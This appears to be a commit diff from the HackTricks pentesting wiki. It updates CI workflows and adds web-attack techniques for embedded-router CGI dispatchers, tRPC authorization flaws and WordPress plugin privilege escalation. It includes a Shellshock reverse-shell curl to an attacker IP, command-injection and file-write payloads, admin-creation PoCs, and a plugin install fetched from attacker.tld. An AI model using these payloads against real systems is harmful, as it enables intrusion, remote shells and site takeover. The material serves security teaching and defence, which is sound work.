mirror of https://github.com/HackTricks-wiki/hacktricks.git (synced 2025-10-10 18:36:50 +00:00)

Merge branch 'master' into update_Silent_Smishing__The_Hidden_Abuse_of_Cellular_Rout_20251001_130854
This commit is contained in: commit b9365ac52d

.github/workflows/build_master.yml (vendored): 106 changed lines
							| @ -43,7 +43,7 @@ jobs: | ||||
|           && sudo apt update \ | ||||
|           && sudo apt install gh -y | ||||
|        | ||||
|       - name: Publish search index release asset | ||||
|       - name: Push search index to hacktricks-searchindex repo | ||||
|         shell: bash | ||||
|         env: | ||||
|           PAT_TOKEN: ${{ secrets.PAT_TOKEN }} | ||||
| @ -51,43 +51,99 @@ jobs: | ||||
|           set -euo pipefail | ||||
| 
 | ||||
|           ASSET="book/searchindex.js" | ||||
|           TAG="searchindex-en" | ||||
|           TITLE="Search Index (en)" | ||||
|           TARGET_REPO="HackTricks-wiki/hacktricks-searchindex" | ||||
|           FILENAME="searchindex-en.js" | ||||
| 
 | ||||
|           if [ ! -f "$ASSET" ]; then | ||||
|             echo "Expected $ASSET to exist after build" >&2 | ||||
|             exit 1 | ||||
|           fi | ||||
| 
 | ||||
|           TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}" | ||||
|           TOKEN="${PAT_TOKEN}" | ||||
|           if [ -z "$TOKEN" ]; then | ||||
|             echo "No token available for GitHub CLI" >&2 | ||||
|             echo "No PAT_TOKEN available" >&2 | ||||
|             exit 1 | ||||
|           fi | ||||
|           export GH_TOKEN="$TOKEN" | ||||
| 
 | ||||
|           # Delete the release if it exists | ||||
|           echo "Checking if release $TAG exists..." | ||||
|           if gh release view "$TAG" --repo "$GITHUB_REPOSITORY" >/dev/null 2>&1; then | ||||
|             echo "Release $TAG already exists, deleting it..." | ||||
|             gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag || { | ||||
|               echo "Failed to delete release, trying without cleanup-tag..." | ||||
|               gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" || { | ||||
|                 echo "Warning: Could not delete existing release, will try to recreate..." | ||||
|               } | ||||
|             } | ||||
|             sleep 2  # Give GitHub API a moment to process the deletion | ||||
|           # Clone the searchindex repo | ||||
|           git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo | ||||
|            | ||||
|           cd /tmp/searchindex-repo | ||||
|           git config user.name "GitHub Actions" | ||||
|           git config user.email "github-actions@github.com" | ||||
|            | ||||
|           # Compress the searchindex file | ||||
|           cd "${GITHUB_WORKSPACE}" | ||||
|           gzip -9 -k -f "$ASSET" | ||||
|            | ||||
|           # Show compression stats | ||||
|           ORIGINAL_SIZE=$(wc -c < "$ASSET") | ||||
|           COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz") | ||||
|           RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}") | ||||
|           echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)" | ||||
|            | ||||
|           # Copy the .gz version to the searchindex repo | ||||
|           cd /tmp/searchindex-repo | ||||
|           cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz" | ||||
|            | ||||
|           # Stage the updated file | ||||
|           git add "${FILENAME}.gz" | ||||
|            | ||||
|           # Commit and push with retry logic | ||||
|           if git diff --staged --quiet; then | ||||
|             echo "No changes to commit" | ||||
|           else | ||||
|             echo "Release $TAG does not exist, proceeding with creation..." | ||||
|             TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC") | ||||
|             git commit -m "Update searchindex files - ${TIMESTAMP}" | ||||
|              | ||||
|             # Retry push up to 20 times with pull --rebase between attempts | ||||
|             MAX_RETRIES=20 | ||||
|             RETRY_COUNT=0 | ||||
|             while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do | ||||
|               if git push origin master; then | ||||
|                 echo "Successfully pushed on attempt $((RETRY_COUNT + 1))" | ||||
|                 break | ||||
|               else | ||||
|                 RETRY_COUNT=$((RETRY_COUNT + 1)) | ||||
|                 if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then | ||||
|                   echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..." | ||||
|                    | ||||
|                   # Try normal rebase first | ||||
|                   if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then | ||||
|                     echo "Rebase successful, retrying push..." | ||||
|                   else | ||||
|                     # If rebase fails due to divergent histories (orphan branch reset), re-clone | ||||
|                     if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then | ||||
|                       echo "Detected history rewrite, re-cloning repository..." | ||||
|                       cd /tmp | ||||
|                       rm -rf searchindex-repo | ||||
|                       git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo | ||||
|                       cd searchindex-repo | ||||
|                       git config user.name "GitHub Actions" | ||||
|                       git config user.email "github-actions@github.com" | ||||
|                        | ||||
|                       # Re-copy the .gz version | ||||
|                       cp "${GITHUB_WORKSPACE}/${ASSET}.gz" "${FILENAME}.gz" | ||||
|                        | ||||
|                       git add "${FILENAME}.gz" | ||||
|                       TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S UTC") | ||||
|                       git commit -m "Update searchindex files - ${TIMESTAMP}" | ||||
|                       echo "Re-cloned and re-committed, will retry push..." | ||||
|                     else | ||||
|                       echo "Rebase failed for unknown reason, retrying anyway..." | ||||
|                     fi | ||||
|                   fi | ||||
|                    | ||||
|                   sleep 1 | ||||
|                 else | ||||
|                   echo "Failed to push after $MAX_RETRIES attempts" | ||||
|                   exit 1 | ||||
|                 fi | ||||
|               fi | ||||
|             done | ||||
|           fi | ||||
|            | ||||
|           # Create new release (with force flag to overwrite if deletion failed) | ||||
|           gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" || { | ||||
|             echo "Failed to create release, trying with force flag..." | ||||
|             gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" --cleanup-tag >/dev/null 2>&1 || true | ||||
|             sleep 2 | ||||
|             gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for master" --repo "$GITHUB_REPOSITORY" | ||||
|           } | ||||
|           echo "Successfully pushed searchindex files" | ||||
| 
 | ||||
| 
 | ||||
|       # Login in AWs | ||||
|  | ||||
							
								
								
									
.github/workflows/translate_all.yml (vendored): 90 changed lines
							| @ -129,7 +129,7 @@ jobs: | ||||
|           git pull | ||||
|           MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1) | ||||
|        | ||||
|       - name: Publish search index release asset | ||||
|       - name: Push search index to hacktricks-searchindex repo | ||||
|         shell: bash | ||||
|         env: | ||||
|           PAT_TOKEN: ${{ secrets.PAT_TOKEN }} | ||||
| @ -137,31 +137,93 @@ jobs: | ||||
|           set -euo pipefail | ||||
| 
 | ||||
|           ASSET="book/searchindex.js" | ||||
|           TAG="searchindex-${BRANCH}" | ||||
|           TITLE="Search Index (${BRANCH})" | ||||
|           TARGET_REPO="HackTricks-wiki/hacktricks-searchindex" | ||||
|           FILENAME="searchindex-${BRANCH}.js" | ||||
| 
 | ||||
|           if [ ! -f "$ASSET" ]; then | ||||
|             echo "Expected $ASSET to exist after build" >&2 | ||||
|             exit 1 | ||||
|           fi | ||||
| 
 | ||||
|           TOKEN="${PAT_TOKEN:-${GITHUB_TOKEN:-}}" | ||||
|           TOKEN="${PAT_TOKEN}" | ||||
|           if [ -z "$TOKEN" ]; then | ||||
|             echo "No token available for GitHub CLI" >&2 | ||||
|             echo "No PAT_TOKEN available" >&2 | ||||
|             exit 1 | ||||
|           fi | ||||
|           export GH_TOKEN="$TOKEN" | ||||
| 
 | ||||
|           # Delete the release if it exists | ||||
|           if gh release view "$TAG" >/dev/null 2>&1; then | ||||
|             echo "Release $TAG already exists, deleting it..." | ||||
|             gh release delete "$TAG" --yes --repo "$GITHUB_REPOSITORY" | ||||
|           fi | ||||
|           # Clone the searchindex repo | ||||
|           git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo | ||||
|            | ||||
|           # Create new release | ||||
|           gh release create "$TAG" "$ASSET" --title "$TITLE" --notes "Automated search index build for $BRANCH" --repo "$GITHUB_REPOSITORY" | ||||
|           # Compress the searchindex file | ||||
|           gzip -9 -k -f "$ASSET" | ||||
|            | ||||
|           # Show compression stats | ||||
|           ORIGINAL_SIZE=$(wc -c < "$ASSET") | ||||
|           COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz") | ||||
|           RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}") | ||||
|           echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)" | ||||
|            | ||||
|           # Copy ONLY the .gz version to the searchindex repo (no uncompressed .js) | ||||
|           cp "${ASSET}.gz" "/tmp/searchindex-repo/${FILENAME}.gz" | ||||
|            | ||||
|           # Commit and push with retry logic | ||||
|           cd /tmp/searchindex-repo | ||||
|           git config user.name "GitHub Actions" | ||||
|           git config user.email "github-actions@github.com" | ||||
|           git add "${FILENAME}.gz" | ||||
|            | ||||
|           if git diff --staged --quiet; then | ||||
|             echo "No changes to commit" | ||||
|           else | ||||
|             git commit -m "Update ${FILENAME} from hacktricks-cloud build" | ||||
|              | ||||
|             # Retry push up to 20 times with pull --rebase between attempts | ||||
|             MAX_RETRIES=20 | ||||
|             RETRY_COUNT=0 | ||||
|             while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do | ||||
|               if git push origin master; then | ||||
|                 echo "Successfully pushed on attempt $((RETRY_COUNT + 1))" | ||||
|                 break | ||||
|               else | ||||
|                 RETRY_COUNT=$((RETRY_COUNT + 1)) | ||||
|                 if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then | ||||
|                   echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..." | ||||
|                    | ||||
|                   # Try normal rebase first | ||||
|                   if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then | ||||
|                     echo "Rebase successful, retrying push..." | ||||
|                   else | ||||
|                     # If rebase fails due to divergent histories (orphan branch reset), re-clone | ||||
|                     if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then | ||||
|                       echo "Detected history rewrite, re-cloning repository..." | ||||
|                       cd /tmp | ||||
|                       rm -rf searchindex-repo | ||||
|                       git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo | ||||
|                       cd searchindex-repo | ||||
|                       git config user.name "GitHub Actions" | ||||
|                       git config user.email "github-actions@github.com" | ||||
|                        | ||||
|                       # Re-copy ONLY the .gz version (no uncompressed .js) | ||||
|                       cp "${ASSET}.gz" "${FILENAME}.gz" | ||||
|                        | ||||
|                       git add "${FILENAME}.gz" | ||||
|                       git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build" | ||||
|                       echo "Re-cloned and re-committed, will retry push..." | ||||
|                     else | ||||
|                       echo "Rebase failed for unknown reason, retrying anyway..." | ||||
|                     fi | ||||
|                   fi | ||||
|                    | ||||
|                   sleep 1 | ||||
|                 else | ||||
|                   echo "Failed to push after $MAX_RETRIES attempts" | ||||
|                   exit 1 | ||||
|                 fi | ||||
|               fi | ||||
|             done | ||||
|           fi | ||||
| 
 | ||||
|       # Login in AWs | ||||
|       # Login in AWS | ||||
|       - name: Configure AWS credentials using OIDC | ||||
|         uses: aws-actions/configure-aws-credentials@v3 | ||||
|         with: | ||||
|  | ||||
| @ -226,7 +226,7 @@ https://www.lasttowersolutions.com/ | ||||
| 
 | ||||
| ### [K8Studio - The Smarter GUI to Manage Kubernetes.](https://k8studio.io/) | ||||
| 
 | ||||
| <figure><img src="images/k8studio.jpg" alt="k8studio logo"><figcaption></figcaption></figure> | ||||
| <figure><img src="images/k8studio.png" alt="k8studio logo"><figcaption></figcaption></figure> | ||||
| 
 | ||||
| K8Studio IDE empowers DevOps, DevSecOps, and developers to manage, monitor, and secure Kubernetes clusters efficiently. Leverage our AI-driven insights, advanced security framework, and intuitive CloudMaps GUI to visualize your clusters, understand their state, and act with confidence. | ||||
| 
 | ||||
|  | ||||
										
Binary file not shown. Before: 6.5 KiB

BIN src/images/k8studio.png (new file). Binary file not shown. After: 87 KiB
| @ -83,7 +83,7 @@ You can check if the sudo version is vulnerable using this grep. | ||||
| sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]" | ||||
| ``` | ||||
| 
 | ||||
| #### sudo < v1.28 | ||||
| #### sudo < v1.8.28 | ||||
| 
 | ||||
| From @sickrov | ||||
| 
 | ||||
|  | ||||
| @ -59,11 +59,37 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt | ||||
| > run | ||||
| ``` | ||||
| 
 | ||||
| ## **Proxy \(MitM to Web server requests\)** | ||||
| ## Centralized CGI dispatchers (single endpoint routing via selector parameters) | ||||
| 
 | ||||
| CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" | ||||
| Many embedded web UIs multiplex dozens of privileged actions behind a single CGI endpoint (for example, `/cgi-bin/cstecgi.cgi`) and use a selector parameter such as `topicurl=<handler>` to route the request to an internal function. | ||||
| 
 | ||||
| As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. | ||||
| Methodology to exploit these routers: | ||||
| 
 | ||||
| - Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack firmware and grep for handler strings used by the dispatcher (see the enumeration sketch below). | ||||
| - Test unauthenticated reachability: some handlers forget auth checks and are directly callable. | ||||
| - Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`. | ||||
| 
 | ||||
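A minimal enumeration loop for the first step above might look like this (a sketch: the dispatcher path `cstecgi.cgi`, the wordlist `handlers.txt`, and the error-string filter are assumptions that must be adapted per device):

```bash
#!/usr/bin/env bash
# Probe candidate handler names against a centralized CGI dispatcher.
# Handlers that answer with anything other than the generic "unknown topic"
# error are candidates for missing-auth or injection testing.
TARGET="http://192.168.0.1/cgi-bin/cstecgi.cgi"   # assumed dispatcher path

while read -r handler; do
  resp=$(curl -s -m 5 -X POST "$TARGET" \
           -H 'Content-Type: application/x-www-form-urlencoded' \
           --data "topicurl=${handler}")
  # Adjust the filter to the device's generic error response
  if ! grep -qiE 'invalid|unknown|fail' <<<"$resp"; then
    printf '[+] %s -> %.120s\n' "$handler" "$resp"
  fi
done < handlers.txt
```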
| Generic exploit shapes: | ||||
| 
 | ||||
| ```http | ||||
| POST /cgi-bin/cstecgi.cgi HTTP/1.1 | ||||
| Content-Type: application/x-www-form-urlencoded | ||||
| 
 | ||||
| # 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools | ||||
| topicurl=<handler>&param=-n | ||||
| 
 | ||||
| # 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell | ||||
| topicurl=setEasyMeshAgentCfg&agentName=;id; | ||||
| 
 | ||||
| # 3) Validator bypass → arbitrary file write in file-touching handlers | ||||
| topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc | ||||
| ``` | ||||
| 
 | ||||
| Detection and hardening: | ||||
| 
 | ||||
| - Watch for unauthenticated requests to centralized CGI endpoints with `topicurl` set to sensitive handlers. | ||||
| - Flag parameters that begin with `-` (argv option injection attempts). | ||||
| - Vendors: enforce authentication on all state-changing handlers, validate using strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags. | ||||
| 
 | ||||
| ## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) | ||||
| 
 | ||||
| @ -80,8 +106,14 @@ curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:500 | ||||
| 
 | ||||
| **More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** | ||||
| 
 | ||||
| ## **Proxy \(MitM to Web server requests\)** | ||||
| 
 | ||||
| CGI creates an environment variable for each header in the HTTP request. For example, "Host: web.com" becomes "HTTP_HOST"="web.com". | ||||
| 
 | ||||
| Since the HTTP_PROXY variable may be used by the web server, try sending a **header** containing "**Proxy: <IP_attacker>:<PORT>**". If the server performs any request during the session, you will be able to capture each request made by the server. | ||||
| 
 | ||||
| ## **References** | ||||
| 
 | ||||
| - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
| @ -28,6 +28,53 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th | ||||
| - **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing. | ||||
| - **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions. | ||||
| 
 | ||||
| ### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls | ||||
| 
 | ||||
| Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC, `protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by `protectedProcedure`. | ||||
| 
 | ||||
| - Threat model: Any low-privileged authenticated user can call admin-grade procedures if role checks are missing (e.g., background migrations, feature flags, tenant-wide maintenance, job control). | ||||
| - Black-box signal: `POST /api/trpc/<router>.<procedure>` endpoints that succeed for basic accounts when they should be admin-only. Self-serve signups drastically increase exploitability. | ||||
| - Typical tRPC route shape (v10+): JSON body wrapped under `{"input": {...}}`. | ||||
| 
 | ||||
| Example vulnerable pattern (no role/permission gate): | ||||
| 
 | ||||
| ```ts | ||||
| // The endpoint for retrying a migration job | ||||
| // This checks for a valid session (authentication) | ||||
| retry: protectedProcedure | ||||
|   // but not for an admin role (authorization). | ||||
|   .input(z.object({ name: z.string() })) | ||||
|   .mutation(async ({ input, ctx }) => { | ||||
|     // Logic to restart a sensitive migration | ||||
|   }), | ||||
| ``` | ||||
| 
 | ||||
| Practical exploitation (black-box) | ||||
| 
 | ||||
| 1) Register a normal account and obtain an authenticated session (cookies/headers). | ||||
| 2) Enumerate background jobs or other sensitive resources via “list”/“all”/“status” procedures. | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -b '<AUTH_COOKIES>' \ | ||||
|   --data '{"input":{}}' | ||||
| ``` | ||||
| 
 | ||||
| 3) Invoke privileged actions such as restarting a job: | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -b '<AUTH_COOKIES>' \ | ||||
|   --data '{"input":{"name":"<migration_name>"}}' | ||||
| ``` | ||||
| 
 | ||||
| Impact to assess | ||||
| 
 | ||||
| - Data corruption via non-idempotent restarts: Forcing concurrent runs of migrations/workers can create race conditions and inconsistent partial states (silent data loss, broken analytics). | ||||
| - DoS via worker/DB starvation: Repeatedly triggering heavy jobs can exhaust worker pools and database connections, causing tenant-wide outages. | ||||
| 
 | ||||
| ### **Tools and Resources for API Pentesting** | ||||
| 
 | ||||
| - [**kiterunner**](https://github.com/assetnote/kiterunner): Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs. | ||||
| @ -53,8 +100,6 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0 | ||||
| ## References | ||||
| 
 | ||||
| - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire) | ||||
| - [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
| @ -447,15 +447,6 @@ Detection checklist | ||||
| - Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers. | ||||
| - Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values. | ||||
| 
 | ||||
| Hardening | ||||
| 
 | ||||
| - Never derive authentication or authorization from client-controlled headers. | ||||
| - If a reverse proxy must inject identity, terminate trust at the proxy and strip inbound copies (e.g., `unset X-Wcpay-Platform-Checkout-User` at the edge), then pass a signed token and verify it server-side. | ||||
| - For REST routes performing privileged actions, require `current_user_can()` checks and a strict `permission_callback` (do NOT use `__return_true`). | ||||
| - Prefer first-party auth (cookies, application passwords, OAuth) over header “impersonation”. | ||||
| 
 | ||||
| References: see the links at the end of this page for a public case and broader analysis. | ||||
| 
 | ||||
| ### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0) | ||||
| 
 | ||||
| WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks.  When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement: | ||||
| @ -511,31 +502,6 @@ Other impactful targets include plugin/theme `.php` files (to break security plu | ||||
| * Concatenation of unsanitised user input into paths (look for `$_POST`, `$_GET`, `$_REQUEST`). | ||||
| * Absence of `check_ajax_referer()` and `current_user_can()`/`is_user_logged_in()`. | ||||
| 
 | ||||
| #### Hardening | ||||
| 
 | ||||
| ```php | ||||
| function secure_remove_font_family() { | ||||
|     if ( ! is_user_logged_in() ) { | ||||
|         wp_send_json_error( 'forbidden', 403 ); | ||||
|     } | ||||
|     check_ajax_referer( 'litho_fonts_nonce' ); | ||||
| 
 | ||||
|     $fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) ); | ||||
|     $srcdir = trailingslashit( wp_upload_dir()['basedir'] ) . 'litho-fonts/' . $fontfamily; | ||||
| 
 | ||||
|     if ( ! str_starts_with( realpath( $srcdir ), realpath( wp_upload_dir()['basedir'] ) ) ) { | ||||
|         wp_send_json_error( 'invalid path', 400 ); | ||||
|     } | ||||
|     // … proceed … | ||||
| } | ||||
| add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' ); | ||||
| //  🔒  NO wp_ajax_nopriv_ registration | ||||
| ``` | ||||
| 
 | ||||
| > [!TIP] | ||||
| > **Always** treat any write/delete operation on disk as privileged and double-check: | ||||
| > • Authentication  • Authorisation  • Nonce  • Input sanitisation  • Path containment (e.g. via `realpath()` plus `str_starts_with()`). | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ### Privilege escalation via stale role restoration and missing authorization (ASE "View Admin as Role") | ||||
| @ -565,12 +531,6 @@ Why it’s exploitable | ||||
| - If a user previously had higher privileges saved in `_asenha_view_admin_as_original_roles` and was downgraded, they can restore them by hitting the reset path. | ||||
| - In some deployments, any authenticated user could trigger a reset for another username still present in `viewing_admin_as_role_are` (broken authorization). | ||||
| 
 | ||||
| Attack prerequisites | ||||
| 
 | ||||
| - Vulnerable plugin version with the feature enabled. | ||||
| - Target account has a stale high-privilege role stored in user meta from earlier use. | ||||
| - Any authenticated session; missing nonce/capability on the reset flow. | ||||
| 
 | ||||
| Exploitation (example) | ||||
| 
 | ||||
| ```bash | ||||
| @ -591,21 +551,6 @@ Detection checklist | ||||
|   - Modify roles via `add_role()` / `remove_role()` without `current_user_can()` and `wp_verify_nonce()` / `check_admin_referer()`. | ||||
|   - Authorize based on a plugin option array (e.g., `viewing_admin_as_role_are`) instead of the actor’s capabilities. | ||||
| 
 | ||||
| Hardening | ||||
| 
 | ||||
| - Enforce capability checks on every state-changing branch (e.g., `current_user_can('manage_options')` or stricter). | ||||
| - Require nonces for all role/permission mutations and verify them: `check_admin_referer()` / `wp_verify_nonce()`. | ||||
| - Never trust request-supplied usernames; resolve the target user server-side based on the authenticated actor and explicit policy. | ||||
| - Invalidate “original roles” state on profile/role updates to avoid stale high-privilege restoration: | ||||
| 
 | ||||
| ```php | ||||
| add_action( 'profile_update', function( $user_id ) { | ||||
|     delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' ); | ||||
| }, 10, 1 ); | ||||
| ``` | ||||
| 
 | ||||
| - Consider storing minimal state and using time-limited, capability-guarded tokens for temporary role switches. | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder “sf-booking”) | ||||
| @ -852,6 +797,123 @@ Patched behaviour (Jobmonster 4.8.0) | ||||
| 
 | ||||
| - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']). | ||||
| 
 | ||||
| ## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82) | ||||
| 
 | ||||
| Some plugins expose REST endpoints that mint reusable “connection keys” or tokens without verifying the caller’s capabilities. If the route authenticates only on a guessable attribute (e.g., username) and does not bind the key to a user/session with capability checks, any unauthenticated attacker can mint a key and invoke privileged actions (admin account creation, plugin actions → RCE). | ||||
| 
 | ||||
| - Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection | ||||
| - Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback | ||||
| - Impact: full takeover by chaining the minted key to internal privileged actions | ||||
| 
 | ||||
| PoC – mint a connection key and use it | ||||
| 
 | ||||
| ```bash | ||||
| # 1) Obtain key (unauthenticated). Exact payload varies per plugin | ||||
| curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   --data '{"username":"admin"}' | ||||
| # → {"key":"<conn_key>", ...} | ||||
| 
 | ||||
| # 2) Call privileged plugin action using the minted key (namespace/route vary per plugin) | ||||
| curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -H 'X-Connection-Key: <conn_key>' \ | ||||
|   --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}' | ||||
| ``` | ||||
| 
 | ||||
| Why it’s exploitable | ||||
| - Sensitive REST route protected only by low-entropy identity proof (username) or missing permission_callback | ||||
| - No capability enforcement; minted key is accepted as a universal bypass | ||||
| 
 | ||||
| Detection checklist | ||||
| - Grep plugin code for register_rest_route(..., [ 'permission_callback' => '__return_true' ]) (see the grep sketch below) | ||||
| - Any route that issues tokens/keys based on request-supplied identity (username/email) without tying to an authenticated user or capability | ||||
| - Look for subsequent routes that accept the minted token/key without server-side capability checks | ||||
| 
 | ||||
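A source-level sweep for the first item in the checklist can be approximated with grep (a sketch; quoting and spacing of the `permission_callback` declaration vary between plugins, so the pattern is deliberately loose):

```bash
# List plugin files that register REST routes and also contain an always-true permission_callback
grep -RIl --include='*.php' 'register_rest_route' wp-content/plugins/ \
  | xargs -r grep -lE "permission_callback.*__return_true"
```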
| Hardening | ||||
| - For any privileged REST route: require permission_callback that enforces current_user_can() for the required capability | ||||
| - Do not mint long-lived keys from client-supplied identity; if needed, issue short-lived, user-bound tokens post-authentication and recheck capabilities on use | ||||
| - Validate the caller’s user context (wp_set_current_user is not sufficient alone) and reject requests where !is_user_logged_in() || !current_user_can(<cap>) | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Nonce gate misuse → unauthenticated arbitrary plugin installation (FunnelKit Automations ≤ 3.5.3) | ||||
| 
 | ||||
| Nonces prevent CSRF, not authorization. If code treats a nonce pass as a green light and then skips capability checks for privileged operations (e.g., install/activate plugins), unauthenticated attackers can meet a weak nonce requirement and reach RCE by installing a backdoored or vulnerable plugin. | ||||
| 
 | ||||
| - Vulnerable path: plugin/install_and_activate | ||||
| - Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce “passes” | ||||
| - Impact: full compromise via arbitrary plugin install/activation | ||||
| 
 | ||||
| PoC (shape depends on plugin; illustrative only) | ||||
| 
 | ||||
| ```bash | ||||
| curl -i -s -X POST https://victim.tld/wp-json/<fk-namespace>/plugin/install_and_activate \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   --data '{"_nonce":"<weak-pass>","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}' | ||||
| ``` | ||||
| 
 | ||||
| Detection checklist | ||||
| - REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check | ||||
| - Any code path that sets $skip_caps = true after nonce validation | ||||
| 
 | ||||
| Hardening | ||||
| - Always treat nonces as CSRF tokens only; enforce capability checks regardless of nonce state | ||||
| - Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code | ||||
